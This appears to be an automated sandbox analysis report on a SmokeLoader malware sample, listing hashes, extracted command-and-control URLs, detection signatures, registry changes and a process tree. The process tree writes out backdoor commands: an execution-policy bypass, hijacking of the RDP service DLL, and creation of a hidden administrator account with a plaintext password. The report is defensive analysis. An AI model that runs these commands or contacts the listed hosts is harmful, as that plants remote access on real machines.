Analysis
-
max time kernel
151s -
max time network
150s -
submitted
01-01-1970 00:00
Static task
static1
Behavioral task
behavioral1
Sample
440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
Resource
win10-en-20210920
General
-
Target
440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe
-
Size
185KB
-
MD5
df63c915c8e793c30cdf10b5a47101ce
-
SHA1
3a5bfbaa36fa76691b688eac1c8cc6872b92d54a
-
SHA256
440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2
-
SHA512
e27bb953864d738642d442326a0a4c5589dccfbbd209c8d7b3d375a2f7ad29884d6c457be245d3f2133d86cb60e4080da1887f5b58fd5f3363dc7d199a2549f0
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 57 3748 powershell.exe 59 3748 powershell.exe 60 3748 powershell.exe 61 3748 powershell.exe 63 3748 powershell.exe 66 3748 powershell.exe 68 3748 powershell.exe 70 3748 powershell.exe 72 3748 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
6EC3.exepid process 708 6EC3.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3036 -
Loads dropped DLL 2 IoCs
Processes:
pid process 2220 2220 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC755.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC766.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_u2kmhszb.hfo.psm1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0y1js3yg.vit.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC715.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC745.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC776.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = a63109125baed701 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 59 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 60 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exepid process 3844 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe 3844 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 3036 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3036 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 640 640 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exepid process 3844 440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeIncreaseQuotaPrivilege 1576 powershell.exe Token: SeSecurityPrivilege 1576 powershell.exe Token: SeTakeOwnershipPrivilege 1576 powershell.exe Token: SeLoadDriverPrivilege 1576 powershell.exe Token: SeSystemProfilePrivilege 1576 powershell.exe Token: SeSystemtimePrivilege 1576 powershell.exe Token: SeProfSingleProcessPrivilege 1576 powershell.exe Token: SeIncBasePriorityPrivilege 1576 powershell.exe Token: SeCreatePagefilePrivilege 1576 powershell.exe Token: SeBackupPrivilege 1576 powershell.exe Token: SeRestorePrivilege 1576 powershell.exe Token: SeShutdownPrivilege 1576 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeSystemEnvironmentPrivilege 1576 powershell.exe Token: SeRemoteShutdownPrivilege 1576 powershell.exe Token: SeUndockPrivilege 1576 powershell.exe Token: SeManageVolumePrivilege 1576 powershell.exe Token: 33 1576 powershell.exe Token: 34 1576 powershell.exe Token: 35 1576 powershell.exe Token: 36 1576 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeIncreaseQuotaPrivilege 3988 powershell.exe Token: SeSecurityPrivilege 3988 powershell.exe Token: SeTakeOwnershipPrivilege 3988 powershell.exe Token: SeLoadDriverPrivilege 3988 powershell.exe Token: SeSystemProfilePrivilege 3988 powershell.exe Token: SeSystemtimePrivilege 3988 powershell.exe Token: SeProfSingleProcessPrivilege 3988 powershell.exe Token: SeIncBasePriorityPrivilege 3988 powershell.exe Token: SeCreatePagefilePrivilege 3988 powershell.exe Token: SeBackupPrivilege 3988 powershell.exe Token: SeRestorePrivilege 3988 powershell.exe Token: SeShutdownPrivilege 3988 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeSystemEnvironmentPrivilege 3988 powershell.exe Token: SeRemoteShutdownPrivilege 3988 powershell.exe Token: SeUndockPrivilege 3988 powershell.exe Token: SeManageVolumePrivilege 3988 powershell.exe Token: 33 3988 powershell.exe Token: 34 3988 powershell.exe Token: 35 3988 powershell.exe Token: 36 3988 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeIncreaseQuotaPrivilege 1656 powershell.exe Token: SeSecurityPrivilege 1656 powershell.exe Token: SeTakeOwnershipPrivilege 1656 powershell.exe Token: SeLoadDriverPrivilege 1656 powershell.exe Token: SeSystemProfilePrivilege 1656 powershell.exe Token: SeSystemtimePrivilege 1656 powershell.exe Token: SeProfSingleProcessPrivilege 1656 powershell.exe Token: SeIncBasePriorityPrivilege 1656 powershell.exe Token: SeCreatePagefilePrivilege 1656 powershell.exe Token: SeBackupPrivilege 1656 powershell.exe Token: SeRestorePrivilege 1656 powershell.exe Token: SeShutdownPrivilege 1656 powershell.exe Token: SeDebugPrivilege 1656 powershell.exe Token: SeSystemEnvironmentPrivilege 1656 powershell.exe Token: SeRemoteShutdownPrivilege 1656 powershell.exe Token: SeUndockPrivilege 1656 powershell.exe Token: SeManageVolumePrivilege 1656 powershell.exe Token: 33 1656 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3036 3036 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6EC3.exepowershell.execsc.exenet.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3036 wrote to memory of 708 3036 6EC3.exe PID 3036 wrote to memory of 708 3036 6EC3.exe PID 708 wrote to memory of 3024 708 6EC3.exe powershell.exe PID 708 wrote to memory of 3024 708 6EC3.exe powershell.exe PID 3024 wrote to memory of 3312 3024 powershell.exe csc.exe PID 3024 wrote to memory of 3312 3024 powershell.exe csc.exe PID 3312 wrote to memory of 2392 3312 csc.exe cvtres.exe PID 3312 wrote to memory of 2392 3312 csc.exe cvtres.exe PID 3024 wrote to memory of 1576 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 1576 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 3988 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 3988 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 1656 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 1656 3024 powershell.exe powershell.exe PID 3024 wrote to memory of 4056 3024 powershell.exe reg.exe PID 3024 wrote to memory of 4056 3024 powershell.exe reg.exe PID 3024 wrote to memory of 3060 3024 powershell.exe reg.exe PID 3024 wrote to memory of 3060 3024 powershell.exe reg.exe PID 3024 wrote to memory of 3780 3024 powershell.exe reg.exe PID 3024 wrote to memory of 3780 3024 powershell.exe reg.exe PID 3024 wrote to memory of 3164 3024 powershell.exe net.exe PID 3024 wrote to memory of 3164 3024 powershell.exe net.exe PID 3164 wrote to memory of 1936 3164 net.exe net1.exe PID 3164 wrote to memory of 1936 3164 net.exe net1.exe PID 3024 wrote to memory of 1868 3024 powershell.exe cmd.exe PID 3024 wrote to memory of 1868 3024 powershell.exe cmd.exe PID 3876 wrote to memory of 3884 3876 cmd.exe net.exe PID 3876 wrote to memory of 3884 3876 cmd.exe net.exe PID 3884 wrote to memory of 3492 3884 net.exe net1.exe PID 3884 wrote to memory of 3492 3884 net.exe net1.exe PID 3024 wrote to memory of 2324 3024 powershell.exe cmd.exe PID 3024 wrote to memory of 2324 3024 powershell.exe cmd.exe PID 2324 wrote to memory of 3844 2324 cmd.exe cmd.exe PID 2324 wrote to memory of 3844 2324 cmd.exe cmd.exe PID 3844 wrote to memory of 3088 3844 cmd.exe net.exe PID 3844 wrote to memory of 3088 3844 cmd.exe net.exe PID 3088 wrote to memory of 2380 3088 net.exe net1.exe PID 3088 wrote to memory of 2380 3088 net.exe net1.exe PID 3648 wrote to memory of 2948 3648 cmd.exe net.exe PID 3648 wrote to memory of 2948 3648 cmd.exe net.exe PID 2948 wrote to memory of 3996 2948 net.exe net1.exe PID 2948 wrote to memory of 3996 2948 net.exe net1.exe PID 3424 wrote to memory of 1360 3424 cmd.exe net.exe PID 3424 wrote to memory of 1360 3424 cmd.exe net.exe PID 1360 wrote to memory of 2392 1360 net.exe net1.exe PID 1360 wrote to memory of 2392 1360 net.exe net1.exe PID 3312 wrote to memory of 3708 3312 cmd.exe net.exe PID 3312 wrote to memory of 3708 3312 cmd.exe net.exe PID 3708 wrote to memory of 1144 3708 net.exe net1.exe PID 3708 wrote to memory of 1144 3708 net.exe net1.exe PID 1256 wrote to memory of 4084 1256 cmd.exe net.exe PID 1256 wrote to memory of 4084 1256 cmd.exe net.exe PID 4084 wrote to memory of 1444 4084 net.exe net1.exe PID 4084 wrote to memory of 1444 4084 net.exe net1.exe PID 3420 wrote to memory of 1448 3420 cmd.exe net.exe PID 3420 wrote to memory of 1448 3420 cmd.exe net.exe PID 1448 wrote to memory of 3052 1448 net.exe net1.exe PID 1448 wrote to memory of 3052 1448 net.exe net1.exe PID 2952 wrote to memory of 2760 2952 cmd.exe net.exe PID 2952 wrote to memory of 2760 2952 cmd.exe net.exe PID 2760 wrote to memory of 3992 2760 net.exe net1.exe PID 2760 wrote to memory of 3992 2760 net.exe net1.exe PID 2008 wrote to memory of 1892 2008 cmd.exe WMIC.exe PID 2008 wrote to memory of 1892 2008 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe"C:\Users\Admin\AppData\Local\Temp\440682c970b023a75557d55261e82f793b4a09e374256e02af97bf012acda1b2.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\6EC3.exeC:\Users\Admin\AppData\Local\Temp\6EC3.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2bp10wzj\2bp10wzj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES86D0.tmp" "c:\Users\Admin\AppData\Local\Temp\2bp10wzj\CSC20A7C651A2C142128975A83FC589745C.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Fu0qrwun /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Fu0qrwun /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Fu0qrwun /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Fu0qrwun1⤵
- Suspicious use of WriteProcessMemory
-
